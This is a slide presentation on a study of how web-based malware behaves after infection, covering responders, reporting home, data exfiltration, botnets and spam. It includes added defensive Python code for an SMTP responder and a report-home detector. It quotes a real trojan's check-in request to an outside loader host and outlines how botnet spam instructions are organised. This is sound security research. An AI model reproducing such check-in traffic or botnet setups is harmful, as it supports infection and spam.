1. Introduction The underground Internet economy Web-based malware The system analyzing the post-infection network behavior of web-based malware How do.
Introduction
The underground Internet economy
Web-based malware
The system analyzing the post-infection network behavior of web-based malware
How do malware’s behaviors, taken together, provide a compelling perspective on the life cycle of web-based malware? 2

System Architecture  The goal of the system detect harmful URLs on the web  The brief overview of the overall system they used in their prior work machine learning techniques are used to find suspicious URLs among a large number of web pages for verification in a virtual machine  The new extended system Responders 3

System Architecture 4
Overall system architecture
o Virtual machine used for verification
o Observed features: links to known malware distribution sites, suspicious HTML elements, the presence of code obfuscation
o Machine learning system: scores each URL; a URL with a high score is sent to the virtual machine for verification
o Verification results are used to retrain the machine learning system

System Architecture  They extended the system improving verification components with light-weight responders  Providing fabricated responses for protocols such as SMTP, FTP and IRC  HTTP proxy is to record all HTTP requests and scan all HTTP responses  Generic responder is to hand off connections over nonstandard ports and identify connections that use unknown protocols Responders 5

 Network flow in the verification component 6

Life cycle of web-based malware
o Malware’s interactions with other hosts and responders are organized into 3 categories:
1. Propagation
2. Data exfiltration
3. Remote control
o They analyzed the post-infection activity and the results of these behaviors to find out the life cycle of web-based malware 7

Life cycle of web-based malware
Data Set
 In 2 months the virtual machine analyzed URLs from 5,756,000 unique host names; results are reported per unique host name
 At least one harmful URL was found on 307,000 hostnames
 49% of these websites had URLs that resulted in HTTP requests initiated from a process other than the web browser
 5% of the sites had URLs that activated a responder session
 The total number of responder sessions with transmitted data is more than 448,000
 They observed that malware made network connections without transmitting data in many more cases 8

Life cycle of web-based malware Network characteristics  The destination ports of all outgoing connections from the virtual machine upon infection 9

Life cycle of web-based malware Network characteristics  They notified the number of unique hostnames for each port On these hosts at least one URL installs malware that transmitted data to that port  More than 400 different destination ports were connected This shows the diverse nature of malware’s post- infection network behavior 10

 The exact distribution of HTTP connections destined to nonstandard ports according to the destination port number 11

Life cycle of web-based malware
Discovery and Propagation
 Malware usually scans for other vulnerable systems, either in the same LAN or on the Internet, in order to propagate
 This figure shows the network protocol distribution used by malware 12

Life cycle of web-based malware Reporting Home  To observe this activity SMTP responders are employed to capture s  Each captured has a subject and body 13

Life cycle of web-based malware
Reporting Home

TABLE 1
Subject                            # Messages
XP Hacked                          390
ProRat [...]                       162
Vip Passw0rds                      98
Log file from...                   82
Installation report                76
Perfect Keylogger [...]            47
Installation on XP succeeded       12
E g y S p y KeyLogger [...]        12
INFECTADO                          6
Mais 1: XP                         3
AVSXP                              3
C-h-e-c-k-i-n-g:XP                 2
...:Noticia quentinha de:... XP    2
 Table 1 shows the most common subjects

TABLE 2
SMTP Server       # Messages
yahoo.com         436
google.com        118
tvm.com.tr        98
aol.com           82
hotmail.com       19
outblaze.com      8
globo.com         6
Table 2 above shows the most common SMTP servers used by malware to send installation reports 14
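As an added example (not the authors' responder code), here is a minimal SMTP responder of the kind the verification component on slide 5 uses: it fabricates a mail server, accepts whatever the infected machine sends, and captures each message instead of delivering it, so subjects can be tallied as in Table 1 above. The hostname, addresses and client transcript are constructed.

```python
import email
from collections import Counter

class SmtpResponder:
    """Fabricated SMTP server: accepts every command, delivers nothing."""
    def __init__(self):
        self.in_data, self.buffer = False, []   # DATA-block state
        self.sender, self.rcpts = None, []
        self.captured = []   # (sender, recipients, email.message.Message)

    def feed(self, line):
        """Consume one client line (no CRLF); return the reply to send, or None."""
        if self.in_data:
            if line == ".":                            # end of message
                msg = email.message_from_string("\n".join(self.buffer))
                self.captured.append((self.sender, self.rcpts, msg))
                self.in_data, self.buffer, self.sender, self.rcpts = False, [], None, []
                return "250 OK queued"                 # a lie: nothing is delivered
            # undo SMTP dot-stuffing (RFC 5321 4.5.2): a leading ".." becomes "."
            self.buffer.append(line[1:] if line.startswith("..") else line)
            return None
        verb, arg = line[:4].upper(), line[4:]         # SMTP verbs are 4 letters
        if verb in ("HELO", "EHLO"):
            return "250 mail.example.invalid"          # constructed hostname
        if verb == "MAIL":                             # MAIL FROM:<addr>
            self.sender = arg.partition(":")[2].strip().strip("<>")
        elif verb == "RCPT":                           # RCPT TO:<addr>
            self.rcpts.append(arg.partition(":")[2].strip().strip("<>"))
        elif verb == "DATA":
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        elif verb == "QUIT":
            return "221 Bye"
        return "250 OK"   # accept everything else so the client keeps talking

def subject_tally(responder):
    """Like Table 1 above: how often each Subject appears across captured mail."""
    return Counter(str(m["subject"] or "(none)") for _, _, m in responder.captured)

# Constructed transcript (not real traffic): two installation reports, one dot-stuffed line.
SAMPLE_CLIENT_LINES = [
    "EHLO victim", "MAIL FROM:<bot@victim.invalid>", "RCPT TO:<drop@example.invalid>",
    "DATA", "Subject: XP Hacked", "", "ip=10.0.0.5 user=alice", "..dotted line", ".",
    "MAIL FROM:<bot@victim.invalid>", "RCPT TO:<drop@example.invalid>", "DATA",
    "Subject: XP Hacked", "", "second report", ".", "QUIT",
]

def replay(lines):
    """Drive the responder from a transcript; returns (responder, replies sent)."""
    r = SmtpResponder()
    replies = ["220 mail.example.invalid ESMTP"] + [x for x in map(r.feed, lines) if x]
    return r, replies
```

To serve real sessions, read one CRLF-terminated line at a time from a socket, pass it to `feed`, and write back whatever it returns.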

Life cycle of web-based malware
Reporting Home
 The HTTP protocol is also used to report successful installations back to malware authors
 The trojan example:
GET /geturl.php?version=1.1.2&fid=7493&mac= &lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; )
Host: loader.51edm.net:1207
Cache-Control: no-cache
15
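An added example, not from the paper, of what the HTTP proxy in the verification component could do with a recorded request like the one above: parse it and flag the report-home pattern (a nonstandard Host port plus host-fingerprint query fields). The indicator list and threshold are assumptions; the MAC value, blank on the slide, is left empty.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed indicator list: query keys that describe the infected host rather than
# a web resource (the request above carries several of them).
FINGERPRINT_KEYS = {"mac", "version", "lversion", "wversion", "fid", "name"}
STANDARD_PORTS = {80, 443, 8080}

def parse_request(raw):
    """Split a raw HTTP request into method, path, query dict, host and port."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, sep, value = h.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    host, _, port = headers.get("host", "").partition(":")
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "host": host,
            "port": int(port) if port.isdigit() else 80,   # HTTP default port
            "query": parse_qs(parts.query, keep_blank_values=True)}

def report_home_indicators(req):
    """Return the reasons a request looks like an installation report (empty = none)."""
    reasons = []
    if req["port"] not in STANDARD_PORTS:
        reasons.append(f"nonstandard port {req['port']}")
    hits = FINGERPRINT_KEYS & set(req["query"])
    if len(hits) >= 3:      # assumed threshold for a host-fingerprint query
        reasons.append("fingerprint fields " + ",".join(sorted(hits)))
    return reasons

# The trojan request quoted on the slide; its mac value is blank there and is
# left empty here.
TROJAN_REQUEST = (
    "GET /geturl.php?version=1.1.2&fid=7493&mac=&lversion=&wversion=&day=0"
    "&name=dodolook&recent=0 HTTP/1.1\r\n"
    "Accept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; )\r\n"
    "Host: loader.51edm.net:1207\r\nCache-Control: no-cache\r\n\r\n"
)
# Constructed ordinary page fetch for contrast.
BENIGN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0\r\n\r\n")
```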

Life cycle of web-based malware Reporting Home  Malware also reported infections using a custom XML-like format HGZ :55:30 80 _& Windows XP 5.1 XP 488 Ver XP English (United States) Windows XP 1024MB 2200 MHz LAN

Life cycle of web-based malware Data exfiltration  There are indications of data exfiltration in responder sessions such as browser history files and stored passwords o In their observation, they found some s that send back stored password from a compromised machine o HTTP is also used for sending sensitive information back to data collection servers (notice the large number of POST requests on the graph on slide #11) 17

Life cycle of web-based malware Data exfiltration  In 2 days, one server had 4,729 files including more than 250,000 valid addresses  They found more sensitive information in extensive logs continuously uploaded by malware Logs have victim’s IP address, DNS server, gateway, MAC address, username, URL, intercepted form and password fields of HTTP request o In 250MB logs, 500 usernames and passwords were found for over 250 web sites such as banking site, google.com, yahoo.com, etc. 18

Life cycle of web-based malware
Joining Botnets
 Botnets
 They encountered 2 types of botnets in their work:
1. IRC Botnets
2. HTTP Botnets 19

Life cycle of web-based malware IRC Botnets  IRC and C&C communication  IRC sessions to 90 servers were observed using 1587 different nicknames in 95 channels 20

Life cycle of web-based malware IRC Botnets  Some malwares use regular nicknames and channels, but some of them use artificial nicknames such as [0]USA|XP[P] or Inject-2l

Life cycle of web-based malware HTTP Botnets  Organize large-scale spam campaigns  To participate in spam campaigns each bot repeatedly downloaded ZIP-archives with instructions using HTTP requests  Each response has a ZIP-archive with instructions on how to participate in spam campaigns 22

Life cycle of web-based malware HTTP Botnets  Some example instructions:  000_data22 - a list of domains and their authoritative name severs used to form the sender's address  001_ncommall - a list of common first names used as part of the sender's address  002_otkogo_r - a list of possible ``from'' names related to the subject of the spam campaign  003_subj_rep - a list of possible subjects,  004_outlook - the template of the spam ,  config - a configuration file that instructs the bot how to construct s from the data files, how many s to sent in total, and how many connections are allowed at a given time,  message - the message body of the spam campaign,  mlist - a list of addresses to which to send the spam,  andmxdata - a binary file containing information about the mail- exchange servers for the addresses in mlist 23

Life cycle of web-based malware
HTTP Botnets
Top domains out of 700,000 e-mail addresses collected from a spam-sending botnet.
Domain                   Frequency
yahoo.com                28899
sbcglobal.net            14417
yahoo.co.uk              8939
shaw.ca                  8321
hotmail.com              6985
korea.com                6041
yahoo.co.jp              5215
striker.ottawa.on.ca     4415
web.de                   4276
yahoo.co.in              4200
o The most frequent domains captured in an hour didn’t entirely overlap with the larger data set 24

Summary and Conclusion 25